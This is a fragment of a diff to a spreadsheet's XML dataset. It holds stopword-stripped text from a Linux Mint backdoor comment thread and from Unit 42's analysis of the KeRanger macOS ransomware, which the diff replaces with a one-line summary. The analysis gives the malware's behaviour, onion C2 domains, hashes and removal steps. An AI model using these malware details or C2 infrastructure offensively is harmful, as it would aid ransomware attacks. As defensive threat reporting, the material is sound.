'mint', 'mint', 'day', 'reply', 'md5sum', 'live', 'session', 'file', 'varlibmancy', 'iso', 'live', 'session', 'directory', 'file', 'mancy', 'reply', 'file', '19th', 'unfortunate', 'occurence', 'reply', 'mirror', 'area', 'fast', 'hand', 'couple', 'point', 'release', 'mint', 'usable', 'cpufreq', 'answer', 'disable', 'intelpstate', 'mint', 'old', 'version', 'mess', 'reply', 'mancy', 'partition', 'win8', 'secondary', 'laptop', 'drive', 'lucky', 'network', 'able', 'access', 'website', 'service', 'able', 'ping', 'able', 'access', 'website', 'blog', 'post', 'solution', 'safe', 'thank', 'afaik', 'backdoor', 'initial', 'connection', 'resolution', 'list', 'domain', 'name', 'safe', 'make', 'sure', 'install', 'reply', 'torrent', 'option', 'long', 'server', 'cold', 'torrent', 'file', 'blog', 'people', 'download', 'reply', 'copy', 'size', 'difference', 'legit', 'script', 'full', 'copy', 'attacker', 'server', 'offline', 'mega', 'reply', 'careful', 'attribution', 'link', 'obvious', 'first', 'address', 'city', 'address', 'know', 'internet', 'database', 'client', 'second', 'domain', 'proxy', 'third', 'domain', 'address', 'convenient', 'remote', 'access', 'reply', 'website', 'admin', 'alot', 'situation', 'reply', 'integrity', 'check', 'possible', 'attacker', 'craft', 'checksum', 'original', 'sum', 'reply', 'plata', 'good', 'internet', 'standard', 'automatic', 'check', 'md5sum', 'general', 'tail', 'httpstailsboumorgblueprintbootstrappingextension', 'reply', 'true', 'need', 'change', 'password', 'reply', 'great', 'work', 'distribution', 'community', 'sympathy', 'right', 'question', 'authority', 'right', 'thing', 'large', 'amount', 'user', 'shasum', 'comment', 'mirror', 'server', 'https', 'first', 'priority', 'safe', 'quick', 'https', 'website', 'reply', 'know', 'release', 'edition', 'torrent', 'direct', 'http', 'link', 'afraid', 'right', 'iso', 'first', '64bit', 'md5sum', 'faulty', 'result', 'download', 'direct', 'download', '64bit', 'problem', 'incorrect', 'md5sum', 'couple', 'hour', '64bit', 'cinnamon', 'result', 'guy', 'sorry', 'reply', 'florian', 'promoter', 'reply', 'barclay', 'post', 'constructive', 'suggestion', 'signature', 'verification', 'md5sum', 'cryptographic', 'global', 'standard', 'secure', 'verification', 'digital', 'datum', 'enough', 'contrary', 'posting', 'insecure', 'md5sum', 'website', 'secure', 'https', 'connection', 'imho', 'least', 'negligent', 'hard', 'dead', 'canary', 'aware', 'illusion', 'hard', 'fight', 'tool', 'fingertip', 'thank', 'great', 'distro', 'florian', 'reply', 'error', 'partition', 'installing', 'redownload', '20th', 'error', 'today', 'start', 'stick', 'computer', 'installer', 'entire', 'window', 'damage', 'reply', 'checksum', 'signature', 'user', 'real', 'meaning', 'signature', 'thing', 'safe', 'reply', 'onequestion', 'sure', 'value', 'page', 'reply', 'community', 'team', 'open', 'transparent', 'event', 'opener', 'general', 'important', 'basement', 'safe', 'point', 'fast', 'hack', 'undetected', 'month', 'shitty', 'time', 'moment', 'work', 'passion', 'foss', 'mind', 'victim', 'wrongdoer', 'process', 'transparent', 'possible', 'people', 'good', 'luck', 'reply', 'dumb', 'question', 'window', 'window', 'clem', 'file', 'dangerous', 'dangerous', 'backdoor', 'reply', 'little', 'time', 'wordpress', 'installation', 'several', 'excellent', 'plugin', 'available', 'assist', 'process', 'enough', 'attacker', 'odd', 'random', 'script', 'kid', 'classic', 'well', 'compartmentalize', 'wordpress', 'system', 'important', 'reply', 'bash64', 'issue', 'ebook', 'turbo', 'chapter', 'download', 'website', 'httpbettyboopdatabaseatwebpagescombook', 'reply', 'luuk', 'advertisement', 'serious', 'website', 'good', 'luck', 'luuk', 'reply', 'version', 'partition', 'likely', 'data', 'credential', 'partition', 'reply', 'curious', 'able', 'narrow', 'breach', 'interested', 'wordpress', 'core', 'attack', 'vulnerable', 'plugin', 'reply', 'good', 'direct', 'file', 'mint', 'md5sum', 'terminal', 'match', 'value', 'thank', 'developer', 'problem', 'user', 'vulnerability', 'digital', 'worldtake', 'good', 'luck', 'recovery', 'beautiful', 'make', 'site', 'developer', 'valiant', 'upfront', 'honesty', 'refreshing', 'vigilance', 'cold', 'beer', 'wordpress', 'problem', 'oder', 'reply', '21st', 'md5sum', 'live', 'session', 'file', 'varlibmancy', 'iso', 'live', 'session', 'directory', 'file', 'mancy', 'interesting', 'case', 'image', 'file', 'file', 'mancy', 'system', 'clean', 'crazy', 'timing', 'mint', 'yesterday', '20th', 'different', 'mirror', 'turn', 'history', 'http5104175216stable173linuxmint173cinnamon64bitiso', 'download', 'backdoor', 'door', 'question', 'interested', 'reply', 'thank', 'segnalation', 'control', 'attention', 'trust', 'claim', 'problem', 'good', 'reply', 'question', 'website', 'file', 'signature', 'well', 'public', 'key', 'independent', 'website', 'reply', 'site', 'able', 'boot', 'reason', 'option', 'superdrive', 'checksum', 'check', 'download', 'life', 'hope', 'able', 'figure', 'issue', 'mint', 'favorite', 'distribution', 'guess', 'people', 'mint', 'popular', 'reply', 'user', 'door', 'rabbit', 'hole', 'lead', 'edit', 'sofia', 'server', 'second', 'backdoor', 'look', 'hole', 'need', 'figure', 'action', 'hacker', 'personal', 'prevent', 'site', 'part', 'download', 'yesterday', '20th', 'german', 'server', 'checksum', 'valid', 'error', 'message', 'install', 'attention', 'edid', 'invalid', 'reminder', 'error', 'message', 'time', 'bulgarian', 'exciting', 'account', 'linuxmintorg', 'post', 'course', 'reply', 'evidence', 'attack', 'core', 'unlikely', 'report', 'likely', 'plugin', 'theme', 'author', 'file', 'permission', 'server', 'misconfiguration', 'wordpress', 'core', 'detail', 'detrimental', 'edit', 'backdoor', 'theme', 'directory', 'wordpress', 'installation', 'plugin', 'theme', 'file', 'permission', 'hour', 'attack', 'know', 'finger', 'people', 'wordpress', 'attack', 'reply', 'hope', 'hope', 'switch', 'joomla', 'link', 'number', 'database', 'link', 'mirror', 'reply', 'plata', 'iso', 'checksum', 'hope', 'guy', 'updateserver', 'updatechecking', 'day', 'reply', 'checksum', 'case', 'site', 'moment', 'reply', 'thank', 'managing', 'incident', 'attack', 'kind', 'hacker', 'number', 'hacker', 'guardianservice', 'shield', 'download', 'webpresence', 'access', 'manager', 'virtual', 'network', 'virtual', 'network', 'file', 'kind', 'service', 'file', 'similar', 'rkhunter', 'hour', 'file', 'change', 'information', 'single', 'individual', 'funding', 'attack', 'relay', 'firm', 'reply', 'faraday', '20th', 'different', 'hash', '19th', 'morning', 'hash', 'today', 'hash', 'aware', 'slashdot', 'firehose', 'peaceofmind', 'username', 'shell', 'mailer', 'full', 'forum', 'dump', 'bitcoin', 'edit', 'good', 'disagree', 'origin', 'attack', 'first', 'backdoor', 'possible', 'access', 'forum', 'database', 'information', 'tsunami', 'interesting', 'time', 'evening', 'ultra', 'busy', 'important', 'much', 'possible', 'operandi', 'much', 'datum', 'trust', 'ready', 'purchase', 'additional', 'server', 'service', 'firm', 'look', 'bottom', 'software', 'developer', 'expert', 'much', 'reply', 'comment', 'repository', 'updateserver', 'need', 'reply', 'radish', 'way', 'good', 'amazed', 'attitude', 'basic', 'mint', 'forum', 'forum', 'firewall', 'controller', 'gufw', 'default', 'people', 'real', 'guru', 'mint', 'necessary', 'relative', 'window', 'point', 'view', 'attitude', 'expert', 'installing', 'gufw', 'part', 'mint', 'least', 'little', 'detrimental', 'basis', 'well', 'good', 'argument', 'time', 'install', 'thing', 'additional', 'layer', 'time', 'install', 'mint', 'developer', 'server', 'good', 'user', 'point', 'user', 'matter', 'routine', 'install', 'gufw', 'time', 'install', 'sense', 'serious', 'development', 'gufw', 'naive', 'user', 'gufw', 'blocking', 'connection', 'perprogramperprocess', 'basis', 'surface', 'situation', 'iso', 'attitude', 'community', 'opinion', 'area', 'attitude', 'issue', 'good', 'time', 'address', 'hope', 'yesterday', 'signature', 'copy', 'personal', 'edit', 'afaik', 'downloading', 'dangerous', 'backdoor', 'install', 'reply', 'bodies74', 'computer', 'network', 'edit', 'backdoor', 'backdoor', 'hacker', 'issue', 'computer', 'hard', 'know', 'much', 'effort', 'computer', 'network', 'check', 'computer', 'able', 'computer', 'network', 'reply', 'site', 'administrator', 'pain', 'thank', 'transparency', 'static', 'site', 'generator', 'similar', 'tool', 'easy', 'fantastic', 'site', 'template', 'advantage', 'feature', 'desktop', 'computer', 'rsync', 'bunch', 'file', 'server', 'impossible', 'exploit', 'edit', 'cool', 'dynamic', 'server', 'page', 'forum', 'stage', 'reply', 'discussion', 'door', 'secure', 'fire', 'real', 'lesson', 'important', 'enough', 'fire', 'rpgs', 'reply', 'check', 'signature', 'redirection', 'moment', 'error', 'unreachable', 'website', 'reply', 'hacker', 'password', 'datum', 'user', 'separate', 'post', 'different', 'people', 'reply', 'issue', 'suggestion', 'update', 'install', 'flash', 'list', 'default', 'package', 'reply', 'file', 'folder', 'available', 'live', 'thank', 'file', 'source', 'code', 'backdoor', 'reply', 'right', 'hash', 'file', 'long', 'trustable', 'meaning', 'wellknown', 'key', 'community', 'attack', 'hash', 'hash', 'deprecated', 'year', 'sha256', 'minimum', 'standard', 'change', 'cellphone', 'sha256', 'hash', 'minute', 'less', 'course', 'multiplication', 'decentralization', 'extra', 'check', 'cheer', 'kudo', 'sure', 'many', 'last', 'night', 'many', 'urgent', 'news', 'guy', 'can´t', 'mintupdate', 'push', 'update', 'computer', 'backdoor', 'edit', 'backdoor', 'code', 'know', 'important', 'messing', 'reply', 'video', 'broken', 'sha3', 'algorithm', 'computerphile', 'thought', 'legitimate', 'torrent', 'reply', 'habitual', 'second', 'intrusion', 'update', 'manager', 'yesterday', 'concerned', 'edit', 'reply', 'schafdog', 'radish', 'help', 'network', 'protocol', 'http', 'software', 'breach', 'firewall', 'smart', 'move', 'case', 'software', 'hang', 'drop', 'packet', 'reply', 'newbie', 'friendly', 'eeepic', 'inevitable', 'reply', 'guy', 'sorry', 'issue', 'mint', 'project', 'great', 'people', 'sure', 'sure', 'good', 'getting', 'https', 'setup', 'free', 'certificate', 'friend', 'static', 'page', 'main', 'linuxmint', 'page', 'message', 'startup', 'page', 'mine', 'cinnamon', 'checker', 'verify', 'download', 'reply', 'alen', 'check', 'mint', 'edit', 'clem', 'file', 'varlibmancy', 'right', 'file', 'likely', 'possibility', 'hacker', 'backdoor', 'file', 'honest', 'excessive', 'precaution', 'risk', 'reply', 'chance', 'current', 'clean', 'install', 'edit', 'easy', 'sound', 'confident', 'trace', 'hack', 'repository', 'reply', 'contact', 'owner', 'network', 'article', 'case', 'measure', 'reply', 'detailed', 'description', 'wordpress', 'curious', '0day', 'wordpress', 'core', 'plugin', 'core', 'wordpress', 'wordpress', 'website', 'serious', 'problem', 'clem', 'plugin', 'late', 'custom', 'theme', 'file', 'permission', 'hour', 'expert', 'exact', 'cause', 'moment', 'indication', 'related', 'core', 'site', 'mint', 'windows7', '20th', 'internet', 'today', 'hack', 'server', 'question', 'enough', 'mint', 'thank', 'reply', 'httpsscrotmoeimagejk80', 'quick', 'conversation', 'translation', 'edit', 'clem', 'people', 'list', 'nice', 'rule', 'server', 'able', 'extra', 'information', 'attacker', 'reply', 'correct', 'linuxmint173cinnamon32bitde20151231iso', 'verifier', 'program', 'thing', 'mean', 'mint', 'popularity', 'proud', 'reply', 'project', 'dozen', 'time', 'year', 'good', 'luck', 'pain', 'reply', 'home', 'computer', 'file', 'sum', 'release', 'attack', 'fake', 'match', 'sum', 'reply', 'laptop', 'night', 'pm', 'need', 'concerned', 'valid', 'signature', 'thank', 'edit', 'httpftpheanetiepublinuxmintcomstable', 'reply', 'interesting', 'translation', 'reply', 'last', 'night', 'window', 'noob', 'step', 'initrdimg', '319032generic', 'archive', 'tech', 'support', 'agent', 'mobile', 'carrier', 'intrusion', 'hope', 'beer', 'able', 'sleep', 'wish', 'clem', 'rare', 'moment', 'sleep', 'well', 'beer', 'reply', 'safe', 'update', 'reply', 'file', 'edit', 'normal', 'reply', 'good', 'idea', 'server', 'comment', 'section', 'private', 'much', 'info', 'visible', 'reply', 'diedmatrix', 'hash', 'match', 'sure', 'virtual', 'machine', 'present', 'reply', 'diedmatrix', 'post', 'varlibmancy', 'image', 'thought', 'folder', 'file', 'reply', 'machine', 'file', 'mancy', 'varlib', 'reply', 'computer', 'computer', 'reinstall', 'format', 'partition', 'change', 'password', 'sensitive', 'website', 'email', 'particular', 'format', 'partition', 'good', 'example', 'trust', 'reply', 'man', 'link', 'address', 'attack', 'network', 'owner', 'look', 'measure', 'edit', 'live', 'session', 'reply', 'search', 'today', 'public', 'profile', 'reliable', 'person', 'traffic', 'source', 'reply', 'blog', 'idea', 'glad', 'torrent', 'thou', 'prior', 'attack', 'able', 'download', 'torrent', 'linuxmintcom', 'week', 'habit', 'check', 'checksum', 'mate', 'reply', 'interesting', 'installing', 'point', 'wonder', 'server', '20th', 'reply', 'claude', 'transparency', 'professionalism', 'support', 'project', 'crisis', 'money', 'hacker', 'good', 'luck', 'reply', '64bit', 'cinnamon', '20th', 'checksum', 'autologin', 'looping', 'password', 'login', 'reply', 'apology', 'offline', 'download', 'clean', 'copy', 'reply', 'old', 'safe', 'wipe', 'system', 'precaution', 'cinnamon', 'girlfriend', 'laptop', 'week', 'opportunity', 'superb', 'distro', 'good', 'work', 'thank', 'reply', 'yesterday', 'upgrading', 'system', 'installation', 'successful', 'upgrade', 'yesterday', 'system', 'today', 'system', 'system', 'technology', 'safe', 'upgrade', 'problem', 'reply', 'thought', 'website', 'forum', 'dark', 'site', 'full', 'forum', 'dump', 'site', 'rate', 'bitcoin', 'download', 'able', 'exist', 'authenticity', 'true', 'reply', 'https', 'cert', 'signature', 'password', 'letter', 'word', 'mint', 'upsetting', 'shot', 'guy', 'strategy', 'tiny', 'indie', 'project', 'vulnerability', 'scale', 'great', 'community', 'thank', 'reply', 'week', 'safe', 'correct', 'reply', 'system', 'fresh', 'installation', 'safe', 'chance', 'last', 'update', 'cinnamon', '19th', 'thank', 'early', 'discovery', 'problem', 'cleanup', 'job', 'cinnamon', 'installation', 'computer', 'network', 'informed', 'infection', 'mint', 'kill', 'win7', 'network', 'connection', 'local', 'user', 'request', 'much', 'coincidence', 'good', 'working', 'installation', 'second', 'reinstall', 'thought', 'home', 'computer', 'file', 'md5s', 'giant', 'supercomputer', 'file', 'knownsafe', 'file', 'different', 'attack', '20th', 'update', 'manager', 'risk', 'comment', 'repository', 'curiousmind', 'certificate', 'amateur', 'mistake', 'reply', 'reticent', 'linuxmint173cinnamon32bitiso', 'match', 'clem', 'download', 'trash', 'presume', 'safe', 'reply', 'tuxd3v', 'guy', 'download', 'mate', 'version', 'day', 'yesterday', 'download', 'mate', 'http', 'root', 'ipv4', 'http', 'root', 'ipv4', 'https', 'root', 'ipv4', 'established208772011http', 'synsent', 'http', 'root', 'http', 'root', 'ipv4', 'problem', 'system', 'clock', 'ipv4', 'closewait', 'good', 'luck', 'thank', 'sharing', 'pwnt', 'theme', 'function', 'website', 'system', 'static', 'input', 'download', 'page', 'mention', 'pleasing', 'concerned', 'version', 'event', 'concerned', '20th', 'site', 'many', 'attempt', 'many', 'connection', 'skype', 'file', 'colleague', 'file', 'contact', 'contact', 'receive', 'figure', 'skype', 'issue', 'fine', 'concerned', 'file', 'date', 'long', '20th', 'thank', 'reply', 'effect', 'mint', 'project', 'trust', 'delicate', 'thing', 'many', 'view', 'master', 'sketchy', 'project', 'base', 'entire', 'system', 'sorry', 'reply', 'barry', 'yesterday', 'practice', 'door', 'many', 'site', 'proverbial', 'barge', 'pole', 'many', 'user', 'important', 'matter', 'hour', 'luck', 'careful', 'need', 'system', 'lead', 'problem', 'reply', 'censoring', 'comment', 'twitter', 'reddit', 'alive', 'root', 'faithful', 'quest', 'good', 'luck', 'reply', 'kudo', 'open', 'rapid', 'action', 'reply', 'different', 'computer', 'update', 'worry', 'mate', 'desktop', 'reply', 'compile', 'webpage', 'difficult', 'future', 'many', 'modern', 'website', 'webpage', 'similar', 'attack', 'website', 'page', 'checksum', 'test', 'index', 'page', 'byte', 'alert', 'administrator', 'page', 'archive', 'useful', 'sha256', 'hash', 'sum', 'https', 'people', 'many', 'year', 'hacker', 'htmlphp', 'site', 'victim', 'hacker', 'website', 'hacker', 'connection', 'https', 'pause', 'unsafe', 'connection', 'reply', 'circumstance', 'mere', 'valid', 'signature', 'short', 'clear', 'hash', 'match', 'value', 'file', 'issue', 'hand', 'business', 'usual', 'incident', 'reminder', 'project', 'point', 'hacker', 'server', 'reply', 'cinnamon', 'yesterday', 'package', 'manager', 'mate', 'reply', 'thank', 'community', 'next', 'step', 'host', 'current', 'host', 'much', 'evidence', 'possible', 'contact', 'authority', 'time', 'amateur', 'detective', 'reply', 'stellarpower', 'thing', 'computer', 'whole', 'lease', 'life', 'bacon', 'upgrade', 'quadcore', 'snail', 'money', 'right', 'time', 'happy', 'cleanup', 'people', 'cost', 'money', 'normal', 'development', 'running', 'cost', 'little', 'fundraiser', 'thank', 'relentless', 'work', 'stressful', 'time', 'appreciated', 'safe', 'regard', 'question', 'machine', 'file', 'mancy', 'varlib', 'sign', 'check', 'mint', 'thank', 'good', 'time', 'update', 'website', 'https', 'http', 'vulnerable', 'reply', 'long', 'time', 'safe', 'worried', 'upgrade', 'change', 'script', 'script', 'standard', 'infected', 'version', '20th', 'safe', 'right', 'safety', 'friend', 'reply', 'thank', 'open', 'issue', 'system', 'advice', 'original', 'author', 'rkhunter', 'guidance', 'free', 'great', 'option', 'distro', 'community', 'good', 'luck', 'incident', 'response', 'reply', 'robppc', 'mint', 'long', 'time', 'time', 'support', 'recoveryinformation', 'gathering', 'process', 'situation', 'link', 'site', 'donating', 'site', 'information', 'mint', 'reply', 'serious', 'lastpass', 'site', 'account', 'lastpass', 'secure', 'password', 'feature', 'random', 'unique', 'password', 'site', 'password', 'master', 'password', 'phrase', 'first', 'letter', 'word', 'phrase', 'password', 'master', 'password', 'reply', 'stellarpower', 'good', 'thirdparty', 'sense', 'separate', 'browser', 'unaffiliated', 'download', 'program', 'link', 'transmission', 'small', 'file', 'application', 'disk', 'image', 'location', 'file', 'download', 'checksum', 'decrypt', 'checksum', 'hash', 'output', 'disk', 'image', 'destination', 'rename', 'part', 'reply', 'good', 'idea', 'sign', 'hash', 'atacker', 'hash', 'portal', 'user', 'check', 'check', 'user', 'good', 'idea', 'host', 'reply', 'wordpress', 'vulnerability', 'important', 'know', 'reply', 'safe', 'main', 'linuxmintcom', 'forum', 'reply', 'bugeater', 'possible', 'version', 'backdoor', 'main', 'concern', '20th', 'love', 'mint', 'nervous', 'ubuntu', 'concerned', 'panic', 'reassurance', 'reply', 'backdoor', 'version', 'unlikely', 'case', 'check', 'mancy', 'guy', 'forum', 'worry', 'disable', 'system', 'user', 'people', 'false', 'hope', 'safe', 'flavour', 'popular', 'hacker', 'easy', 'window', 'user', 'user', 'hacker', 'reply', 'lecter', 'sorry', 'time', 'leave', 'linuxmint', 'safe', 'great', 'late', 'kubuntu', 'reply', 'less', 'kubuntu', 'website'</t>
         </is>
       </c>
     </row>
@@ -1149,17 +1042,12 @@
       </c>
       <c r="C28" t="inlineStr">
         <is>
-          <t>menu tools atoms consulting attack ransomware keranger infected transmission bittorrent client installer people reacted read share claud xiao march category ransomware unit tags keranger post also available japanese march detected transmission bittorrent client installer infected ransomware hours installers initially posted named ransomware “keranger” previous ransomware aware filecoder discovered kaspersky filecoder incomplete time discovery believe keranger first fully functional ransomware seen platform attackers infected installers transmission version keranger morning march identified issue infected files still available downloading transmission site hxxpsdownloadtransmissionbtcomfilestransmission290dmg transmission open source project it’s possible transmission’s official website compromised files replaced recompiled malicious versions can’t confirm infection occurred figure keranger hosted transmissions official website keranger application signed valid development certificate therefore able bypass apple’s gatekeeper protection user installs infected apps embedded executable file system keranger waits three days connecting command control servers anonymizer network malware begins encrypting certain types document data files system completing encryption process keranger demands victims bitcoin specific address retrieve files additionally keranger appears still active development seems malware also attempting encrypt time machine backup files prevent victims recovering backup data palo alto networks reported ransomware issue transmission project apple march apple since revoked abused certificate updated xprotect antivirus signature transmission project removed malicious installers website palo alto networks also updated filtering prevention stop keranger impacting systems technical analysis keranger infected transmission installers signed legitimate certificate issued apple developer listed certificate turkish company z7276px673 different developer used sign previous versions transmission installer code signing information found installers generated signed morning march figure code signing information keranger keranger infected transmission installers include extra file named generalrtf transmissionappcontentsresources directory uses icon looks like normal file actually macho format executable file packed users click infected apps bundle executable transmissionappcontentmacostransmission copy generalrtf file librarykernelservice execute “kernelservice” user interface appearing figure malicious executable pretends document figure keranger executes extra generalrtf file unpacking generalrtf determined main behavior encrypt user’s files hold ransom first time executes keranger create three files “kernelpid” “kerneltime” “kernelcomplete” library directory write current time “kerneltime” sleep three days note different sample keranger discovered malware also sleeps three days also makes requests server every five minutes figure keranger sleeps three days fully executing generalrtf collect infected mac’s model name uuid upload information servers servers’ domains subdomains onionlink onionnu domains host servers accessible network executable keep trying connect server respond lines encoded data decoding lines using base64 first line contains public second line written files named “readmefordecrypttxt” figure connect server instructions analyzing samples server returned data readmefordecrypttxt shown following picture asks victims exactly bitcoin currently around specific network website decrypt files website guide victims bitcoin somewhere else transfer attacker address “1pgaubqhncwshyknphgzcrpkyxnxvsmeof” figure readme file victim bitcoin figure website transfer bitcoin decryption pack connecting server retrieving encryption executable traverse “users” “volumes” directories encrypt files “users” encrypt files “volumes” certain file extensions different extensions specified malware including documents docx docm dotm pptx pptm potx potm ppsm ppsx xlsx xlsm xltm xltx images jpeg audio video flac archives gzip source code class java database email certificate figure encrypt files users specific files volumes keranger statically linked open source encryption library named mbed formerly polarssl keranger encrypts file testdocx starts creating encrypted version uses encrypted extension testdocxencrypted encrypt file keranger starts generating random number encrypts retrieved server using algorithm stores encrypted beginning resulting file next generate initialization vector using original file’s contents store inside resulting file generate encryption finally contents original file write encrypted data result file figure encrypt file’s content addition behavior seems like keranger still development apparent functions named “createtcpsocket” “executecmd” “encrypttimemachine” finished used current samples analysis suggests attacker trying develop backdoor functionality encrypt time machine backup files well backup files encrypted victims would able recover damaged files using time machine figure function encrypttimemachine implemented used mitigations reported issue transmission project apple immediately identified apple since revoked abused certificate gatekeeper block malicious installers apple also updated xprotect signatures cover family signature automatically updated computers march transmission project removed malicious installers website also updated filtering prevention stop keranger impacting palo alto networks customers protect users directly downloaded transmission installer official website 1100am march 700pm march infected keranger transmission installer downloaded earlier downloaded third party websites also suggest users perform following checks users older versions transmission appear affected suggest users take following steps identify remove keranger holds files ransom using either terminal finder check whether applicationstransmissionappcontentsresources generalrtf volumestransmissiontransmissionappcontentsresources generalrtf exist exist transmission application infected suggest deleting version transmission using “activity monitor” preinstalled check whether process named “kernelservice” running double check process choose “open files ports” check whether file name like “usersusernamelibrarykernelservice” figure process keranger’s main process suggest terminating “quit force quit” steps also recommend users check whether files “kernelpid” “kerneltime” “kernelcomplete” “kernelservice” existing library directory delete figure malicious kernelservice process since apple revoked abused certificate updated xprotect signatures user tries open known infected version transmission warning dialog shown states “transmissionapp damage computer move trash” “transmission can’t opened eject disk image” case warnings suggest follow apple’s instruction avoid affected figure system prevent user open infected installer acknowledgements greatly thank yuchen zhou jack wang wang palo alto networks helping analyze keranger protect customers timely fashion thanks richard wartell ryan olson chad berndtson palo alto networks assistance analysis reporting iocs samples ransomwareosxkeranger d1ac55a4e610380f0ab239fcc1c5f5a42722e8ee1554cba8074bbae4a5f6dbe1 transmission290dmg e3ad733cea9eba29e86610050c1a15592e6c77820927b9edeb77310975393574 transmission 31b6adb633cff2a0f34cefd2a218097f3a9a8176c9363cc70fe41fe02af810b9 generalrtf d7d765b1ddd235a57a2d13bd065f293a7469594c7e13ea7700e55501206a09b5 transmission 290dmg ddc3dbee2a8ea9d8ed93f0843400653a89350612f2914868485476a847c6484a transmission 6061a554f5997a43c91f49f8aaf40c80a3f547fc6187bee57cd5573641fcf153 generalrtf domains lclebb6kvohlkcmlonionlink lclebb6kvohlkcmlonionnu bmacyzmea723xyazonionlink bmacyzmea723xyazonionnu nejdtkok7oz5kjoconionlink nejdtkok7oz5kjoconionnu updates palo alto networks sign receive latest news cyber intelligence research please enter email address please mark robot submitting form agree terms acknowledge privacy statement popular resources resource center blog communities tech docs unit sitemap legal notices privacy terms documents account manage subscriptions report vulnerability palo alto networks rights reserved</t>
+          <t>Attackers infected two Transmission v2.90 installers available from the Transmission website with KeRanger, using a valid developer key that was not associated with Transmission.</t>
         </is>
       </c>
       <c r="D28" t="inlineStr">
         <is>
           <t>https://unit42.paloaltonetworks.com/new-os-x-ransomware-keranger-infected-transmission-bittorrent-client-installer/</t>
-        </is>
-      </c>
-      <c r="E28" t="inlineStr">
-        <is>
-          <t>['menu', 'tool', 'attack', 'transmission', 'bittorrent', 'client', 'installer', 'people', 'share', 'claud', 'unit', 'tag', 'available', 'japanese', 'transmission', 'bittorrent', 'client', 'installer', 'ransomware', 'hour', 'installer', 'previous', 'ransomware', 'aware', 'kaspersky', 'incomplete', 'time', 'functional', 'ransomware', 'platform', 'attacker', 'transmission', 'version', 'issue', 'file', 'available', 'transmission', 'site', 'transmission', 'open', 'source', 'project', 'possible', 'transmission', 'official', 'website', 'file', 'malicious', 'version', 'infection', 'figure', 'transmission', 'official', 'website', 'application', 'valid', 'development', 'certificate', 'able', 'bypass', 'apple', 'gatekeeper', 'protection', 'user', 'infected', 'app', 'executable', 'file', 'system', 'day', 'command', 'control', 'server', 'network', 'certain', 'type', 'datum', 'file', 'system', 'encryption', 'process', 'victim', 'bitcoin', 'specific', 'address', 'retrieve', 'file', 'active', 'development', 'malware', 'encrypt', 'time', 'machine', 'backup', 'file', 'victim', 'backup', 'network', 'ransomware', 'issue', 'transmission', 'project', 'apple', 'apple', 'certificate', 'signature', 'transmission', 'project', 'malicious', 'installer', 'website', 'network', 'filtering', 'prevention', 'system', 'technical', 'analysis', 'transmission', 'installer', 'legitimate', 'certificate', 'apple', 'developer', 'certificate', 'turkish', 'company', 'different', 'developer', 'sign', 'previous', 'version', 'transmission', 'installer', 'code', 'information', 'installer', 'morning', 'figure', 'code', 'transmission', 'installer', 'extra', 'file', 'generalrtf', 'transmissionappcontentsresource', 'directory', 'icon', 'normal', 'file', 'macho', 'format', 'executable', 'file', 'user', 'infected', 'app', 'executable', 'transmissionappcontentmacostransmission', 'file', 'librarykernelservice', 'user', 'interface', 'figure', 'malicious', 'executable', 'document', 'figure', 'extra', 'generalrtf', 'file', 'generalrtf', 'main', 'behavior', 'user', 'file', 'ransom', 'first', 'time', 'file', 'kernelpid', 'kerneltime', 'kernelcomplete', 'library', 'directory', 'current', 'time', 'kerneltime', 'sleep', 'day', 'different', 'day', 'request', 'minute', 'figure', 'day', 'generalrtf', 'model', 'name', 'uuid', 'information', 'server', 'server', 'domain', 'subdomain', 'onionnu', 'host', 'server', 'accessible', 'network', 'executable', 'connect', 'server', 'respond', 'line', 'datum', 'line', 'base64', 'first', 'line', 'public', 'second', 'line', 'file', 'readmefordecrypttxt', 'figure', 'connect', 'server', 'instruction', 'sample', 'server', 'datum', 'readmefordecrypttxt', 'picture', 'victim', 'specific', 'network', 'website', 'file', 'website', 'guide', 'victim', 'attacker', 'address', 'figure', 'file', 'victim', 'bitcoin', 'figure', 'website', 'bitcoin', 'decryption', 'pack', 'server', 'encryption', 'executable', 'user', 'volume', 'directory', 'file', 'user', 'encrypt', 'file', 'volume', 'certain', 'file', 'extension', 'different', 'extension', 'malware', 'document', 'potm', 'video', 'code', 'class', 'database', 'email', 'certificate', 'figure', 'encrypt', 'user', 'specific', 'file', 'volume', 'open', 'source', 'encryption', 'library', 'file', 'testdocx', 'version', 'extension', 'random', 'number', 'encrypt', 'server', 'store', 'file', 'generate', 'initialization', 'vector', 'original', 'file', 'content', 'store', 'file', 'encryption', 'original', 'file', 'data', 'result', 'file', 'figure', 'file', 'content', 'addition', 'behavior', 'apparent', 'function', 'createtcpsocket', 'executecmd', 'encrypttimemachine', 'current', 'sample', 'analysis', 'attacker', 'backdoor', 'functionality', 'time', 'machine', 'backup', 'file', 'backup', 'file', 'victim', 'able', 'file', 'time', 'machine', 'figure', 'function', 'encrypttimemachine', 'mitigation', 'issue', 'transmission', 'project', 'apple', 'apple', 'certificate', 'gatekeeper', 'block', 'malicious', 'installer', 'apple', 'signature', 'family', 'signature', 'computer', 'transmission', 'project', 'malicious', 'installer', 'website', 'filtering', 'network', 'customer', 'user', 'transmission', 'installer', 'official', 'website', 'installer', 'third', 'party', 'website', 'user', 'check', 'user', 'old', 'version', 'transmission', 'user', 'step', 'file', 'ransom', 'terminal', 'finder', 'check', 'generalrtf', 'volumestransmissiontransmissionappcontentsresource', 'transmission', 'application', 'version', 'transmission', 'activity', 'monitor', 'check', 'process', 'kernelservice', 'double', 'check', 'process', 'open', 'file', 'port', 'file', 'name', 'usersusernamelibrarykernelservice', 'figure', 'main', 'process', 'force', 'step', 'user', 'file', 'kernelpid', 'kerneltime', 'kernelcomplete', 'kernelservice', 'library', 'directory', 'delete', 'figure', 'malicious', 'process', 'apple', 'certificate', 'signature', 'user', 'open', 'version', 'transmission', 'warning', 'dialog', 'state', 'transmissionapp', 'damage', 'computer', 'trash', 'transmission', 'eject', 'disk', 'image', 'case', 'warning', 'apple', 'instruction', 'figure', 'system', 'user', 'open', 'installer', 'acknowledgement', 'customer', 'timely', 'fashion', 'network', 'assistance', 'analysis', 'reporting', 'sample', 'ransomwareosxkeranger', 'e3ad733cea9eba29e86610050c1a15592e6c77820927b9edeb77310975393574', 'transmission', 'generalrtf', 'transmission', 'transmission', 'generalrtf', 'domain', 'lclebb6kvohlkcmlonionlink', 'lclebb6kvohlkcmlonionnu', 'network', 'sign', 'late', 'news', 'cyber', 'intelligence', 'research', 'email', 'address', 'mark', 'robot', 'form', 'term', 'privacy', 'statement', 'popular', 'resource', 'resource', 'center', 'blog', 'community', 'unit', 'sitemap', 'legal', 'notice', 'privacy', 'term', 'document', 'account', 'manage', 'subscription', 